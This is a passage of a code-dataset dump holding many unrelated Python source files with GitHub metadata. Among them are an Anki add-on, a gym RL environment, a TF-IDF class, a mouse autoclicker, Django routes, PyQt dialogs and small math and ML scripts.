show_pop_up(seconds_taken):\n \"\"\"\n Displays a pop-up window on screen detailing the number of seconds taken, along with a brief message\n\n :param seconds_taken: How many seconds (rounded down) the user stayed on the card\n \"\"\"\n if seconds_taken < 2:\n showInfo( \"You only spent a second on this card! %s\" % choice(SLOW_DOWN_MESSAGES) )\n else:\n showInfo( \"You only spent %d seconds on this card. %s\" % ( seconds_taken, choice(SLOW_DOWN_MESSAGES) ) )\n\ndef play_sound():\n \"\"\" Plays a short sound effect if the add-on is not muted \"\"\"\n if not MUTED:\n play(slow_down_sound)\n\ndef judge_pace_new(card, ease, early): # 2.1.20+\n judge_pace(card, ease)\n\ndef judge_pace_old(self, ease): # 2.1.19-\n judge_pace(self.card, ease)\n\ndef judge_pace_new2(card, ease, early): # 2.1.35+\n judge_pace_2(card, ease)\n\ndef judge_pace_2(card, ease): # 2.1.35+\n if mw.col.sched.answerButtons(mw.reviewer.card) == 1 and ease.timeTaken() < MIN_AGAIN_SECONDS * 1000 :\n play_sound()\n show_pop_up(floor(ease.timeTaken() / 1000) )\n if mw.col.sched.answerButtons(mw.reviewer.card) == 2 and ease.timeTaken() < MIN_HARD_SECONDS * 1000 :\n play_sound()\n show_pop_up(floor(ease.timeTaken() / 1000) )\n if mw.col.sched.answerButtons(mw.reviewer.card) == 3 and ease.timeTaken() < MIN_GOOD_SECONDS * 1000 :\n play_sound()\n show_pop_up(floor(ease.timeTaken() / 1000) )\n if mw.col.sched.answerButtons(mw.reviewer.card) == 4 and ease.timeTaken() < MIN_EASY_SECONDS * 1000 :\n play_sound()\n show_pop_up(floor(ease.timeTaken() / 1000) ) \n\ndef judge_pace(card, ease):\n \"\"\"\n Determines if the user answered the card too quickly, and alerts the user if so\n\n :param card: The card the user has just answered\n :param ease: The difficulty-corresponding button the user selected (1 = incorrect)\n \"\"\"\n if (ease == 1 and card.timeTaken() < MIN_AGAIN_SECONDS * 1000\n or ease == 2 and card.timeTaken() < MIN_HARD_SECONDS * 1000\n or ease == 3 and card.timeTaken() < MIN_GOOD_SECONDS * 1000\n or ease == 4 and card.timeTaken() < MIN_EASY_SECONDS * 1000):\n play_sound()\n show_pop_up( floor(card.timeTaken() / 1000) )\n\n# attach hook depending on version compatibility\ntry:\n gui_hooks.reviewer_did_answer_card.append(judge_pace_new2) #2.1.35+\nexcept AttributeError:\n hooks.schedv2_did_answer_review_card.append(judge_pace_new) #2.1.20+\nexcept AttributeError:\n Reviewer._answerCard = hooks.wrap(Reviewer._answerCard, judge_pace_old, \"before\") #2.1.19-\n","repo_name":"jhd-dev/anki-speed-limit","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3633,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"37463507075","text":"import gym\nfrom gym import spaces\nfrom gym.utils import seeding\nimport numpy as np\nimport matplotlib.pyplot as matplt\nfrom parameters import use_other_utility_function\n\nclass ResourceEnv(gym.Env):\n\n def __init__(self, alpha, weight, total_resource=100, num_res=3, num_user=5, min_reward=100, max_time=20, rho=1.0, aug_penalty=[], test_env=False):\n self.Rmax = total_resource # total number of resource\n self.UENum = num_user # number of slices\n self.num_res = num_res\n self.maxTime = max_time\n self.min_Reward = min_reward * np.ones(self.UENum)\n self.aug_penalty = self.Rmax * np.ones(self.num_res)\n self.aug_penalty = aug_penalty\n self.rho = rho\n self.alpha = alpha\n self.weight = weight\n self.test_env = test_env\n\n self.action_min = np.zeros(self.UENum*self.num_res)\n self.action_max = np.ones(self.UENum*self.num_res)\n self.state_min = np.zeros(self.UENum+self.num_res)\n self.state_max = np.ones(self.UENum+self.num_res)\n\n self.action_space = spaces.Box(self.action_min, self.action_max, dtype=np.float32)\n self.observation_space = spaces.Box(self.state_min, self.state_max, dtype=np.float32)\n\n self.action_dim = self.action_space.shape[0]\n self.observe_dim = self.observation_space.shape[0]\n\n # these variables need reset for env\n self.iter = 0\n self.accu_reward = np.zeros(self.UENum)\n self.remain_reward = self.min_Reward\n\n self.reset()\n\n\n def step(self, in_action):\n\n action = np.clip(in_action, self.action_min, self.action_max)\n\n assert self.action_space.contains(action), \"%r (%s) invalid\" % (action, type(action))\n\n action = self.Rmax * np.reshape(action, [self.num_res, self.UENum]) # reshape into number of resource * number of users\n\n penalty = 0.5 * self.rho * np.sum(np.abs(np.sum(action, axis=1) - self.aug_penalty)) # should be square but too small when gap is 0.1, not good for convergence\n\n real_reward = self.calculate_reward(action)\n\n weight_reward = np.multiply(real_reward, self.weight)\n\n self.accu_reward = np.add(self.accu_reward, real_reward)\n\n #constraint = np.clip((self.remain_reward / (self.maxTime - self.iter)) - real_reward, 0, None) # avg_reward_until_now\n\n #constraint = (self.remain_reward / (self.maxTime - self.iter)) - real_reward # avg_reward_until_now\n\n constraint = [self.tanh_func(real_reward[i], self.min_Reward[i] / self.maxTime) for i in range(self.UENum)] # avg_reward_until_now\n\n self.remain_reward = np.clip(np.subtract(self.min_Reward, self.accu_reward), 0, None)\n\n final_state = np.concatenate([self.remain_reward, self.aug_penalty])\n\n # use maxTime as the weight of constraint, since its calculation is some kind of divided by maxTime\n final_reward = np.sum(weight_reward) + self.maxTime * np.sum(constraint) - penalty # increase the weight of penalty when the episode is almost done\n\n self.iter += 1\n\n done = False\n\n if self.iter >= self.maxTime:\n done = True\n self.reset()\n\n return final_state, final_reward, done, np.sum(weight_reward)\n\n def calculate_reward(self, action):\n\n reward = np.zeros([self.num_res, self.UENum], dtype=np.float32)\n\n for i in range(self.num_res):\n for j in range(self.UENum):\n reward[i][j] = (action[i][j] ** self.alpha[i][j]) / self.alpha[i][j]\n if use_other_utility_function:\n reward[i][j] = self.Rmax/(self.Rmax * np.exp(- self.alpha[i][j] * action[i][j]) + 1)\n\n return np.mean(reward, axis=0) # np.min(reward, axis=0)\n\n def tanh_func(self, x, a):\n\n y = np.clip(1/(np.exp(-2*(x-a))) - 1, -1, 0)\n\n return y\n\n def reset(self):\n\n self.iter = 0\n\n self.accu_reward = np.zeros(self.UENum)\n\n self.remain_reward = self.min_Reward\n\n if not self.test_env: # if not test the env, we random the penalty for training\n self.aug_penalty = np.random.uniform(0, self.Rmax, self.num_res)\n\n initial_state = np.concatenate([self.remain_reward, self.aug_penalty])\n\n return initial_state\n\n def render(self):\n pass\n\n def close(self):\n pass\n","repo_name":"int-unl/DeepSlicing","sub_path":"env_mra.py","file_name":"env_mra.py","file_ext":"py","file_size_in_byte":4311,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"37"} +{"seq_id":"18590558539","text":"import numpy as np\r\nfrom functools import reduce\r\n\r\nclass Tfidf:\r\n @property\r\n def word_dictionary(self):\r\n return self.__word_dictionary\r\n\r\n def __create_idf(self, corpus):\r\n n_words = np.zeros_like(self.__word_dictionary, dtype=int)\r\n for row in corpus:\r\n _, indexes, _ = np.intersect1d(self.word_dictionary, row, return_indices=True)\r\n n_words[indexes] += 1\r\n\r\n return np.log(len(corpus) / (n_words + 1))\r\n\r\n def fit_transform(self, X):\r\n '''\r\n Parameters\r\n ----------\r\n X : shape (n_corpus, text_length)\r\n Training corpus\r\n\r\n Returns\r\n -------\r\n Tf-idf matrix : shape (n_corpus, dictionary_length)\r\n Tf-idf-weighted document-term matrix\r\n '''\r\n self.__word_dictionary = reduce(np.union1d, X)\r\n self.__idf = self.__create_idf(X)\r\n \r\n return self.transform(X)\r\n\r\n def transform(self, X):\r\n '''\r\n Parameters\r\n ----------\r\n X : shape (n_corpus, text_length)\r\n Predicting corpus\r\n\r\n Returns\r\n -------\r\n Tf-idf matrix : shape (n_corpus, dictionary_length)\r\n Tf-idf-weighted document-term matrix\r\n ''' \r\n tf = np.zeros((len(X), len(self.__word_dictionary)))\r\n for i in range(len(X)):\r\n for j in range(len(self.__word_dictionary)):\r\n tf[i, j] = X[i].count(self.__word_dictionary[j])\r\n\r\n return tf * self.__idf","repo_name":"zhaoyichanghong/machine_learing_algo_python","sub_path":"text_preprocess.py","file_name":"text_preprocess.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"37"} +{"seq_id":"15111869437","text":"import time\nimport threading\nfrom pynput.mouse import Controller, Button\nfrom pynput.keyboard import Listener, KeyCode\n\ntoggle_key = KeyCode(char='e')\nclicking = False\nmouse = Controller()\n\n\ndef clicker():\n while True:\n if clicking:\n mouse.click(Button.left, 1)\n time.sleep(0.1)\n\n\ndef toggle_event(key): # будет отслеживать активен ли наш евент и давать возможность преключать состояния\n if key == toggle_key:\n global clicking\n clicking = not clicking\n\n\ndef main():\n clicking_thread = threading.Thread(target=clicker) # поток отслеживает изменения нажатия клавиш на клавиатуре\n clicking_thread.start()\n\n with Listener(on_press=toggle_event) as listener: # поток который занимается кликами\n listener.join() \n\n\nif __name__ == '__main__':\n main()","repo_name":"RavenDenster/clicker-pyToday","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37482966701","text":"import numpy as np\nfrom typing import Callable, NamedTuple, Tuple, Union\nfrom typing import NamedTuple, List, Optional, Any\nfrom spacy.tokens import Doc\nfrom spacy.tokens import Token\n\nfrom src.logconf import get_logger\n\n# logging\nlogger = get_logger(__name__)\nlogger.info(\"Logging from src/axidoc/doctypes.py module.\")\n\nArrRepresentations = Tuple[Union[np.ndarray, None], Union[np.ndarray, None], Union[np.ndarray, None]]\n#SimilarityScores = Tuple[Union[np.ndarray, None], Union[np.ndarray, None], Union[np.ndarray, None]]\nSimilarityScores = Tuple[Union[float, None], Union[float, None], Union[float, None]]\n\n\nclass Window(NamedTuple):\n \"\"\"\n Contains information about a specific window in a document.\n\n Attributes:\n tokens: List of tokens in the window.\n start_pos: Start position of the window in the document.\n end_pos: End position of the window in the document.\n \"\"\"\n\n content: Doc\n start_pos: int\n end_pos: int\n\n\nclass WindowRepresentation(NamedTuple):\n \"\"\"\n Contains a numerical representation about a specific window in a document.\n\n Attributes:\n arr: Numerical representation of the window.\n pos: Start and end positions of window onto the document.\n \"\"\"\n\n arr: np.ndarray\n pos: Optional[Tuple]\n similarity_score: float = None\n\n\nclass SimRepresentation(NamedTuple):\n \"\"\"\n Contains numerical representation and similarity scores for a document.\n\n Attributes:\n doc_representation: Numerical representation of the entire document.\n #features: Optional list of features (tokens) in the document.\n #comparison_features: Optional list of features (tokens) used for comparison.\n comparison_array: Numerical array used for comparison.\n window_repr: Optional list of WindowInfo objects, representing various windows in the document.\n name: Optional string descripting the type of the representation used to compare the documents\n \"\"\"\n\n doc_representation: np.ndarray\n #features: Optional[list] = None\n #comparison_features: Optional[list] = None\n comparison_array: Optional[np.ndarray] = None\n window_repr: Optional[List[WindowRepresentation]] = None\n name: Optional[str] = None\n\n\nclass WindowProp(NamedTuple):\n window_size: Optional[int] = None\n window_overlap: Optional[int] = None\n window_shift: Optional[int] = None\n window_type: Optional[str] = None # 'sentence', 'paragraph', 'document'\n\nclass DocumentWrapper(NamedTuple):\n \"\"\"\n Wraps a SpaCy Doc object and its various numerical representations.\n\n Attributes:\n doc: Original SpaCy Doc object.\n bow: Bag-of-Words representation and related information.\n word2vec: Word2Vec representation and related information.\n glove: GloVe representation and related information.\n \"\"\"\n\n doc: Doc\n bow: Optional[SimRepresentation] = None\n word2vec: Optional[SimRepresentation] = None\n glove: Optional[SimRepresentation] = None\n window_prop: Optional[WindowProp] = None\n\n\ndef sorted_windows_scores(\n document_wrapper: DocumentWrapper, representation_type: Optional[str] = None\n) -> DocumentWrapper:\n \"\"\"Sorts windows in decending order based on their similarity scores.\n document_wrapper: DocumentWrapper instance\n representation_type: Optional[str]: if None (default), all representations are sorted.\n If 'bow', 'word2vec', or 'glove', only the specified representation is sorted.\n \"\"\"\n def sort_windows(sim_rep: SimRepresentation) -> SimRepresentation:\n sorted_window_repr = sorted(\n sim_rep.window_repr, key=lambda x: x.similarity_score, reverse=True\n )\n return sim_rep._replace(window_repr=sorted_window_repr)\n\n if representation_type:\n if representation_type not in [\"bow\", \"word2vec\", \"glove\"]:\n raise ValueError(\n \"Invalid representation_type. Choose from 'bow', 'word2vec', 'glove'.\"\n )\n sim_rep = getattr(document_wrapper, representation_type)\n updated_sim_rep = sort_windows(sim_rep)\n document_wrapper = document_wrapper._replace(**{representation_type: updated_sim_rep})\n else:\n for rep_type in [\"bow\", \"word2vec\", \"glove\"]:\n sim_rep = getattr(document_wrapper, rep_type)\n if sim_rep:\n updated_sim_rep = sort_windows(sim_rep)\n document_wrapper = document_wrapper._replace(**{rep_type: updated_sim_rep})\n\n return document_wrapper\n\n","repo_name":"reinasta/axidoc","sub_path":"src/axidoc/doctypes.py","file_name":"doctypes.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71412655788","text":"from django.urls import path\nfrom .views import index, add_forum, delete_forum, add_flutter, json_flutter\n\nurlpatterns = [\n path('', index, name='index'),\n path('add-forum/', add_forum, name='add_forum'),\n path('delete-forum/',delete_forum, name='delete_forum' ),\n path('webservice-forum', add_flutter, name='add_flutter'),\n path('json', json_flutter, name='json'),\n]","repo_name":"dionmkls/pbp-d05-web","sub_path":"forum/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36175478746","text":"\"\"\"\nInput: nums = [-1,0,1,2,-1,-4]\nOutput: [[-1,-1,2],[-1,0,1]]\n\nWe will use 3 pointers (3 for-loops), but it's not the logic of actual 3 pointers concept.\nThat is in Threepointer.py\n\"\"\"\n\n# THIS SOLUTION WON'T WORK AS THE TIME EXCEEDS\n\nfrom typing import List\n\n\nclass Solution:\n def threeSum(self, nums: List[int]) -> List[List[int]]:\n combinations = []\n nums = sorted(nums)\n for i in range(len(nums) - 2):\n for j in range(i + 1, len(nums) - 1):\n for k in range(j + 1, len(nums)):\n if nums[i] + nums[j] + nums[k] == 0 and [nums[i], nums[j], nums[k]] not in combinations:\n combinations.append([nums[i], nums[j], nums[k]])\n\n return combinations\n\n\nprint(Solution().threeSum([-4, -1, -1, 0, 1, 2]))\n# Solution().threeSum([-1, 0, 1, 2, -1, -4])\n","repo_name":"sandeep194920/Leetcode","sub_path":"12-15.3_Sum(M)/BruteForce.py","file_name":"BruteForce.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14984855796","text":"import pandas as pd\nimport argparse\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom .. import transforms\nfrom ..constants import *\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--labelsize', type=int, default=24)\nargs = parser.parse_args()\n\n\nblosum62_df = pd.DataFrame(transforms.NORMALIZED_BLOSUM62)\nblosum62_df.columns = AMINO_ACIDS\nblosum62_df.index = AMINO_ACIDS\n\nprint(blosum62_df.round(3))\nprint('Mean: ', round(blosum62_df.values.flatten().mean(), 3))\nprint('Std: ', round(blosum62_df.values.flatten().std(), 3))\nplt.hist(blosum62_df.values.flatten())\nplt.savefig('blosum62_hist.png')\n\ngrid_kws = {\"width_ratios\": (.9, .05), \"wspace\": .3}\nfig, (ax, cbar_ax) = plt.subplots(ncols=2, figsize=(15,12), gridspec_kw=grid_kws)\nsns.heatmap(\n blosum62_df,\n annot=True,\n linewidths=2,\n cmap=\"BuPu\",\n ax=ax,\n cbar_ax=cbar_ax,\n)\n\nax.xaxis.tick_top()\nax.xaxis.set_label_position('top')\nax.tick_params(labelsize=args.labelsize)\ncbar_ax.tick_params(labelsize=args.labelsize)\n\nplt.savefig('blosum62_scaled.png')\nplt.clf()\nplt.close()\n\naaindex_ids = sorted([\n # Normalized frequency of alpha-helix (Chou-Fasman, 1978b)\n 'CHOP780201',\n # Normalized frequency of beta-sheet (Chou-Fasman, 1978b)\n 'CHOP780202',\n # Normalized frequency of beta-turn (Chou-Fasman, 1978b)\n 'CHOP780203',\n # Normalized van der Waals volume (Fauchere et al., 1988)\n 'FAUJ880103',\n 'KLEP840101', # Net charge (Klein et al., 1984)\n 'KYTJ820101', # Hydropathy index (Kyte-Doolittle, 1982)\n 'MITS020101', # Amphiphilicity index (Mitaku et al., 2002)\n 'RADA880108', # Mean polarity (Radzicka-Wolfenden, 1988)\n 'CHAM810101', # Steric parameter (Charton, 1981)\n 'CHAM830107', # A parameter of charge transfer capability (Charton-Charton, 1983)\n 'JANJ780101', # Average accessible surface area (Janin et al., 1978)\n 'MEIH800103', # Average side chain orientation angle (Meirovitch et al., 1980)\n 'VELV850101', # Electron-ion interaction potential (Veljkovic et al., 1985)\n 'WERD780101', # Propensity to be buried inside (Wertz-Scheraga, 1978)\n 'ZIMJ680105', # RF rank (Zimmerman et al., 1968)\n 'ZIMJ680104', # Isoelectric point (Zimmerman et al., 1968)\n])\n\naaindex = (transforms.FeatureEncoder(aaindex_ids=aaindex_ids)).aaindex\n\naaindex_df = pd.DataFrame(aaindex)\naaindex_df.columns = aaindex_ids\naaindex_df.index = AMINO_ACIDS\n\naaindex_df = aaindex_df.transpose()\n\ngrid_kws = {\"width_ratios\": (.9, .05), \"wspace\": .3}\nfig, (ax, cbar_ax) = plt.subplots(ncols=2, figsize=(20,12), gridspec_kw=grid_kws)\nsns.heatmap(\n aaindex_df,\n annot=True,\n linewidths=2,\n cmap=\"BuPu\",\n ax=ax,\n cbar_ax=cbar_ax,\n)\n\nax.xaxis.tick_top()\nax.xaxis.set_label_position('top')\nax.tick_params(labelsize=args.labelsize)\ncbar_ax.tick_params(labelsize=args.labelsize)\n\nplt.tight_layout()\nplt.savefig('aaindex_scaled.png')","repo_name":"pbl2021-signal-peptides/pbl21-signal-peptides","sub_path":"multimodal_dnn/plots/plot_input_embeddings.py","file_name":"plot_input_embeddings.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13899349177","text":"import prompt\nfrom random import randint\nfrom brain_games.implementer import defeat_message\nfrom brain_games.implementer import victory_message\n\n\ndef correct_answer(number):\n if number % 2 == 0:\n return 'yes'\n return 'no'\n\n\ndef user_answer(number):\n print('Question: {}'.format(number))\n global answer\n answer = prompt.string('Your answer: ')\n return answer\n\n\ndef even_number():\n round_game = 0\n print('Answer \"yes\" if the number is even, otherwise answer \"no\".')\n while round_game < 3:\n number = randint(1, 99)\n if correct_answer(number) == user_answer(number):\n print('Correct!')\n round_game += 1\n else:\n return print(defeat_message(answer, correct_answer(number)))\n return print(victory_message())\n","repo_name":"sh00tsim/python-project-lvl1","sub_path":"brain_games/games/even.py","file_name":"even.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3478299936","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom app_restaurant.views import django_404, django_500\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', include('app_restaurant.urls')),\n path('members/', include('django.contrib.auth.urls')),\n path('members/', include ('members.urls')),\n]\n\n# Custom Error Pages\nhandler404 = django_404\nhandler500 = django_500\n\n# Configure Admin Titles\nadmin.site.site_header = 'Restaurant Django Administration Page'\n","repo_name":"bianca9901/django-project","sub_path":"project_restaurant/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32603201631","text":"import typing\n\nfrom PyQt5.QtWidgets import QDialog\nfrom PyQt5.QtCore import pyqtSlot, QModelIndex\n\nfrom fgo.ui.AiScenariosDialog import Ui_AiScenarioDialog\n\nclass AiScenariosDialog(QDialog):\n def __init__(self, all_scenarios: typing.List[str], selected_scenarios: typing.List[str]):\n super(QDialog, self).__init__()\n self.ui = Ui_AiScenarioDialog()\n self.ui.setupUi(self)\n self.populate_lists(all_scenarios, selected_scenarios)\n self._selected_active_item = None\n self._selected_available_item = None\n\n def populate_lists(self, all_scenarios: typing.List[str], selected_scenarios: typing.List[str]):\n for item in selected_scenarios:\n self.ui.lwActive.addItem(item)\n\n not_selected = [x for x in all_scenarios if x not in selected_scenarios]\n\n for item in not_selected:\n self.ui.lwAvailable.addItem(item)\n\n @pyqtSlot(QModelIndex)\n def on_lwAvailable_clicked(self, index):\n self._selected_available_item = index.row()\n self.ui.pbAdd.setEnabled(True)\n\n @pyqtSlot()\n def on_pbAdd_clicked(self):\n index = self._selected_available_item\n item = self.ui.lwAvailable.takeItem(index)\n self.ui.lwActive.addItem(item)\n self._selected_available_item = None\n self.ui.pbAdd.setEnabled(False)\n\n @pyqtSlot(QModelIndex)\n def on_lwActive_clicked(self, index):\n self._selected_active_item = index.row()\n self.ui.pbRemove.setEnabled(True)\n\n @pyqtSlot()\n def on_pbRemove_clicked(self):\n index = self._selected_active_item\n item = self.ui.lwActive.takeItem(index)\n self.ui.lwAvailable.addItem(item)\n self._selected_active_item = None\n self.ui.pbRemove.setEnabled(False)\n\n def _get_selected_scenarios(self) -> typing.List[str]:\n res = []\n for item in [self.ui.lwActive.item(i).text() for i in range(0, self.ui.lwActive.count(), 1)]:\n res.append(item)\n return res\n\n def exec_(self) -> typing.Union[list, bool]:\n button_res = super(AiScenariosDialog, self).exec_()\n selection = self._get_selected_scenarios()\n return selection, button_res\n\n @staticmethod\n def getValues(all_scenarios: list, selected_scenarios: list):\n dialog = AiScenariosDialog(all_scenarios, selected_scenarios)\n return dialog.exec_()\n","repo_name":"cgspeck/fg-orchestrator","sub_path":"fgo/director/ai_scenarios_dialog.py","file_name":"ai_scenarios_dialog.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23299774758","text":"import matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn import datasets\nprint(\"Hello Logistic Regression\")\n\nfrom util import create_dataset \n\nx,y = create_dataset(100, insert_x0=False)\nlearning_rate = 0.01\nn = len(x)\nw = np.array([0,0])\ndef error(x,y,w):\n n = len(x)\n err = 0\n for i in range(0,n):\n err += np.log(1 + np.exp(np.dot(-y[i]*w.T,x[i])))\n err = err / n\n return err\n\nerr = err = error(x,y,w)\niter = 0\nmax_iter = 1000\nwhile err > 0.01 and iter < max_iter:\n iter += 1\n d_err = 0\n for i in range(0, n):\n d_err += y[i]*x[i] / (1 + np.exp(y[i]*np.dot(np.transpose(w),x[i])))\n d_err /= -n\n w = w - learning_rate * d_err\n err = error(x,y,w)\n\nprint(w)\n_, axis = plt.subplots()\n\nstep = 0.05\nx1_min, x1_max = x[:, 0].min() - 1, x[:, 0].max() + 1\nx2_min, x2_max = x[:, 1].min() - 1, x[:, 1].max() + 1\nx_mesh, y_mesh = np.meshgrid(np.arange(x1_min, x1_max, step), np.arange(x2_min, x2_max, step))\nx_mesh_flattened = x_mesh.flatten()\ny_mesh_flattened = y_mesh.flatten()\ncfdata = np.transpose(np.array((x_mesh_flattened, y_mesh_flattened)))\nclassification = ((np.sign(np.dot(cfdata, w))+1)/2).reshape(x_mesh.shape)\n# draw boundaries\naxis.contourf(x_mesh, y_mesh, classification, cmap=plt.cm.Paired)\n# draw points\naxis.scatter(x[:, 0], x[:, 1], marker='x', c=y)\naxis.set_title('Logistic Regression')\naxis.axis('off')\naxis.set_aspect('equal', 'datalim')\nplt.show()\n\n","repo_name":"cdietrich/ml-playground","sub_path":"pure-python/classification/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3267993114","text":"from PyQt5 import QtWidgets\n\nimport vqt.saveable as vq_save\nimport vui.qtrace\n\n\nclass VdbWidgetWindow(QtWidgets.QWidget, vq_save.SaveableWidget, vui.qtrace.VQTraceNotifier):\n \"\"\"\n a base window class for widgets to inherit from for vdb.\n this gives your window/widget access to the vdb instance (self.db), the gui\n instance (self.db.gui), and the persistent trace object (self.dbt).\n\n implement vqLoad for tracer events.\n implement vdbUIEvent for events caused by user interaction.\n state between runs of the debugger.\n \"\"\"\n\n def __init__(self, db, dbt, parent=None):\n QtWidgets.QWidget.__init__(self, parent=parent)\n vq_save.SaveableWidget.__init__(self)\n vui.qtrace.VQTraceNotifier.__init__(self, trace=dbt)\n\n self.db = db\n self.dbt = dbt\n\n def keyPressEvent(self, event):\n \"\"\"\n handle the global hotkeys.\n \"\"\"\n self.db.gui.keyPressEvent(event)\n","repo_name":"bat-serjo/vivisect-py3","sub_path":"vui/vdb/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"21233607274","text":"import re \n\n#script to get a string input of a few coordinates, and output the standard form equation for that circle\n\n\ndef checkio(data):\n #data is a string so number only come in certain parts of the array, then I convert them all to integers to perform path\n x1 =int(data[1])\n y1 =int(data[3])\n \n x2 =int(data[7])\n y2 =int(data[9])\n \n x3 =int(data[13])\n y3 =int(data[15])\n \n #equations to determine the 4 parts of a circle equation, used later to convert to standard form\n #equations found here http://www.ambrsoft.com/trigocalc/circle3d.htm\n A = x1*(y2-y3)-y1*(x2-x3)+x2*y3-x3*y2\n B = (x1**2+y1**2)*(y3-y2)+(x2**2+y2**2)*(y1-y3)+(x3**2+y3**2)*(y2-y1)\n C = (x1**2+y1**2)*(x2-x3)+(x2**2+y2**2)*(x3-x1)+(x3**2+y3**2)*(x1-x2)\n D = (x1**2+y1**2)*(x3*y2-x2*y3)+(x2**2+y2**2)*(x1*y3-x3*y1)+(x3**2+y3**2)*(x2*y1-x1*y2)\n \n #Using ABCD I can then calculate the radius and x/y coordinate\n r = (((B**2+C**2)-(4*A*D))/(4*(A**2)))**(0.5)\n x = (0-(B/(2*A)))\n y = (0-(C/(2*A)))\n \n #This 'checker' for this script requires that all tailing zeros are removed, so 3.0 will not work. This converts 3.0 to 3, etc\n if (x.is_integer()):\n x = int(x)\n if (y.is_integer()):\n y = int(y)\n if (r.is_integer()):\n r = int(r)\n \n #round output to 2 decimal places \n r = round(r, 2) \n x = round(x, 2)\n y = round(y, 2)\n \n #printing our vairables for testing\n print (\"A is: \",A)\n print (\"B is: \",B)\n print (\"C is: \",C)\n print (\"D is: \",D)\n print (\"r is: \",r)\n print (\"x is: \",x)\n print (\"y is: \",y)\n \n #craft a string using our variables to make a circle equation in standard form\n answer = ('(x-' + str(x) + ')^2+(y-' + str(y) + ')^2=' + str(r) + '^2')\n print (answer)\n\n return (answer)\n #plot.savefig('hanning' + str(num) + '.pdf')\n\n#These \"asserts\" using only for self-checking and not necessary for auto-testing\nif __name__ == '__main__':\n assert checkio(\"(2,2),(6,2),(2,6)\") == \"(x-4)^2+(y-4)^2=2.83^2\"\n assert checkio(\"(3,7),(6,9),(9,7)\") == \"(x-6)^2+(y-5.75)^2=3.25^2\"\n","repo_name":"tylerwight/Py-Scripts","sub_path":"Circle-from-points.py","file_name":"Circle-from-points.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29060705662","text":"import os \r\n\r\nnumber = []\r\nfor i in range(1,41):\r\n if i in range(1,10):\r\n number.append('0'+'{}'.format(i))\r\n else:\r\n number.append('{}'.format(i))\r\n\r\nfor i in number:\r\n os.makedirs('./images/test'+'/'+ 'Action_'+i)#create 40 class (action) document in the test document\r\n os.makedirs('./images/train'+'/'+ 'Action_'+i)#create 40 class (action) document in the train document\r\n","repo_name":"GMBAKEN/Recognation-of-Humain-Movements","sub_path":"DocumentCreator.py","file_name":"DocumentCreator.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30804907107","text":"# -*- coding: utf-8 -*-\nimport pyside2uic as pui\nfrom os.path import normpath, dirname, join\n\nfiles = {'main_window': 'UI_main.ui', }\nfolder = dirname(__file__)\nfor f in files:\n obj = normpath(join(folder, files.get(f)))\n out = normpath('{}.py'.format(join(folder, f)))\n pyfile = open(out, 'w')\n # print(obj, ' ', out)\n pui.compileUi(obj, pyfile)\n","repo_name":"udushkudush/videocuter","sub_path":"video_cutter/convert_ui.py","file_name":"convert_ui.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30351878920","text":"\"\"\"This file defines an additional layer of abstraction on top of the SARIF OM.\"\"\"\n\nfrom __future__ import annotations\n\nimport dataclasses\nimport enum\nfrom typing import FrozenSet, List, Optional, Sequence, Tuple, Type, TypeVar\n\nfrom torch.onnx._internal.diagnostics.infra import formatter, sarif\n\n\nclass Level(enum.Enum):\n \"\"\"The level of a diagnostic.\n\n This class is used to represent the level of a diagnostic. The levels are defined\n by the SARIF specification, and are not modifiable. For alternative categories,\n please use infra.Tag instead.\n \"\"\"\n\n NONE = enum.auto()\n NOTE = enum.auto()\n WARNING = enum.auto()\n ERROR = enum.auto()\n\n\nlevels = Level\n\n\nclass Tag(enum.Enum):\n \"\"\"The tag of a diagnostic. This class can be inherited to define custom tags.\"\"\"\n\n pass\n\n\nclass PatchedPropertyBag(sarif.PropertyBag):\n \"\"\"Key/value pairs that provide additional information about the object.\n\n The definition of PropertyBag via SARIF spec is \"A property bag is an object (§3.6)\n containing an unordered set of properties with arbitrary 